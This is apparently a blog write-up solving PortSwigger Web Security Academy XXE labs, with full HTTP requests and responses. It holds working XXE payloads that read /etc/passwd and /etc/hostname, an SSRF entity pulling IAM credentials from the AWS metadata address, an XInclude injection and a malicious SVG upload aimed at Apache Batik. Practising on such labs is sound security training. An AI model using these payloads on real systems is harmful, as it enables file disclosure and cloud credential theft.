Published on

XXE Labs Overview

XXE Labs

Solution for some Labs

  1. Lab at https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files

For this lab we just had to add DOCTYPE element in the XML request

POST /product/stock HTTP/1.1
Host: ac471fa01e24fa45c1da07e500c70073.web-security-academy.net
Cookie: session=dHC3Eadta5BLBVZn5ncUNmfdh4NS6XKq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac471fa01e24fa45c1da07e500c70073.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac471fa01e24fa45c1da07e500c70073.web-security-academy.net
Content-Length: 179
Te: trailers
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
  1. Lab at https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

Request is

POST /product/stock HTTP/1.1
Host: ac491fc11faf9821c096360700b50035.web-security-academy.net
Cookie: session=MVs1UcQIMuZIaxaMlk8T8VBGwYlvIgDR
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac491fc11faf9821c096360700b50035.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac491fc11faf9821c096360700b50035.web-security-academy.net
Content-Length: 237
Te: trailers
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE whatwhat [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<stockCheck><productId>
&xxe;</productId><storeId>&xxe;</storeId></stockCheck>

Response is

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 553

"Invalid product ID: 
{
  "Code" : "Success",
  "LastUpdated" : "2021-12-02T03:56:59.596734488Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "lmepP7PiMtM3VPnJdRJQ",
  "SecretAccessKey" : "DmMcGZmJPwlQAVUMkyxpjCLctv15xEq8zKgk5UpE",
  "Token" : "ZdIOYPHVyDE7k8hVfzDv9oGRvJ4Slkt5grwuEKPih1Ot3ZPYrV1rwj5lSQBVd1dZOqVSed2pj3XCB3msq5l0kSqaGOEjqyue57kCL4TRDZiRcdfYzwml7WN5k3aP3LlqOQh9Z2uaFQGwRLE3AmNTgsg19X4Ko6uG2bZgjRNopyTZ0BiTkj3fMTbMMXcJsJnkgvkMBuy23Hm8fNislMYQ4R7tM8sp3ta37bP1LNWaY93QFAloNN0VxlP9Y8aAm2W9",
  "Expiration" : "2027-12-01T03:56:59.596734488Z"
}"
  1. Lab https://portswigger.net/web-security/xxe/lab-xinclude-attack

How did we know which parameter to pollute ?

When I added <xml> in place of 1 ( for productId=1 in param) the response is 

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 118

"XML parser exited with non-zero code 1: The element type xml must be terminated by the matching end-tag </xml>.
"

Solution

Request

POST /product/stock HTTP/1.1
Host: ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net
Cookie: session=lx5TIipReFwKd43FLC8Q0xg8clcQtmG1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Origin: https://ac431f4c1f6aa87ac09212a3007f008c.web-security-academy.net
Content-Length: 128
Te: trailers
Connection: close

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

Response

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 1229

"Invalid product ID: 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
"
  1. Lab https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload

As here it was mentioned to us that the backend uses Apache Batik Library for image processing hence I searched for vulnerabilities surrounding Batik library. I was able to find a report on the vulnerability along with payload used here

svg file payload that we created is :

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="1000px" height="1000px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="100px" x="100" y="400">&xxe;</text></svg>

Request is

POST /post/comment HTTP/1.1
Host: ac571f961eb53715c0de5e2b00460064.web-security-academy.net
Cookie: session=Yuf0K6BH4jteoqJeKkeYM6dQDPfDmkij
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac571f961eb53715c0de5e2b00460064.web-security-academy.net/post?postId=5
Content-Type: multipart/form-data; boundary=---------------------------4953441272046910820874195104
Content-Length: 1271
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="csrf"

zhbpSJRCY0UdwysJFDOPr0yBRIVw5QSB
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="postId"

5
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="comment"

test
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="name"

test
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="avatar"; filename="test_image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="1000px" height="1000px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-family="Verdana" font-size="100px" x="100" y="400">&xxe;</text></svg>
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="email"

test@test.com
-----------------------------4953441272046910820874195104
Content-Disposition: form-data; name="website"

http://www.test.com
-----------------------------4953441272046910820874195104--

The resulting image which can be downloaded has the desired hostname.

BLIND XXE REMAINS

Theory and lab at https://portswigger.net/web-security/xxe/blind . These labs require burp collaborator as they all have out of band interaction involved. Need to buy burp pro 😔